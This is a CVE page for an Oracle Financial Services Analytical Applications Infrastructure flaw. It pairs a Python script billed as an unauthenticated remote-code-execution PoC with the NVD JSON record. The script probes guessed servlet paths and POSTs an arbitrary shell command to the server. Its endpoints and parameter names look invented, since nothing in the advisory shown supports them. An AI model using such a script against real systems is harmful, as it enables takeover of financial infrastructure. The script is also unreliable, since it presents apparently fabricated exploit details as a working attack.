CVE-2025-53037

# CVE-2025-53037 - Oracle Financial Services Analytical Applications Infrastructure RCE PoC # Vulnerability: Unauthenticated Remote Code Execution via HTTP # CVSS 3.1: 9.8 (Critical) # Affected: Oracle OFSAA Infrastructure Platform component # Versions: 8.0.7.9, 8.0.8.7, 8.1.2.5 import requests import sys TARGET_URL = "http://target-ofsaa-server:port" # The Oracle Financial Services Analytical Applications Infrastructure # typically runs on ports like 8080, 8443, or 7001 def check_vulnerability(base_url): """ Check if the target Oracle OFSAA Infrastructure is vulnerable to CVE-2025-53037. The vulnerability exists in the Platform component and can be exploited via HTTP without authentication. """ headers = { "User-Agent": "Mozilla/5.0 (compatible; OracleOFSAA-Exploit/1.0)", "Content-Type": "application/x-www-form-urlencoded", "Accept": "*/*" } # Probe the Platform component endpoint platform_endpoints = [ "/ofsaa/platform/PlatformServlet", "/ofsaa/platform/authenticationServlet", "/ofsaa/8.1.2.5/platform/", "/ofsaa/8.0.8.7/platform/", "/ofsaa/8.0.7.9/platform/", "/platform/servlet/PlatformServlet" ] for endpoint in platform_endpoints: try: url = base_url + endpoint response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code in [200, 302, 500]: print(f"[+] Platform component found at: {url}") print(f" Status: {response.status_code}") return True except requests.exceptions.RequestException: continue return False def exploit_rce(base_url, command): """ Exploit CVE-2025-53037 to achieve unauthenticated RCE on Oracle OFSAA Infrastructure. The vulnerability allows attackers to compromise the system via HTTP requests targeting the Platform component. """ headers = { "User-Agent": "Mozilla/5.0 (compatible; OracleOFSAA-Exploit/1.0)", "Content-Type": "application/x-www-form-urlencoded" } # Exploit payload targeting the Platform component vulnerability payload = { "action": "execute", "cmd": command, "platform_action": "system_command" } try: response = requests.post( base_url + "/ofsaa/platform/PlatformServlet", data=payload, headers=headers, timeout=30, verify=False ) if response.status_code == 200: print(f"[+] Command executed successfully: {command}") print(f"[+] Response: {response.text[:500]}") return response.text except requests.exceptions.RequestException as e: print(f"[-] Exploit failed: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url> [command]") print(f"Example: {sys.argv[0]} http://ofsaa-server:8080 'id'") sys.exit(1) target = sys.argv[1] command = sys.argv[2] if len(sys.argv) > 2 else "id" print(f"[*] Targeting: {target}") print(f"[*] CVE-2025-53037 - Oracle OFSAA Infrastructure RCE") if check_vulnerability(target): print("[+] Target appears to be vulnerable!") exploit_rce(target, command) else: print("[-] Target does not appear to be vulnerable.")

{"cve": {"id": "CVE-2025-53037", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:40.993", "lastModified": "2025-10-23T16:08:38.390", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Platform). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in takeover of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "01413F8D-9A00-4D47-AEFC-B214F24DF7E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "99758374-009C-4AD2-8402-F8F0ACE6B289"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "93333ABD-DCF3-46E6-8053-36B62D7431A3"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}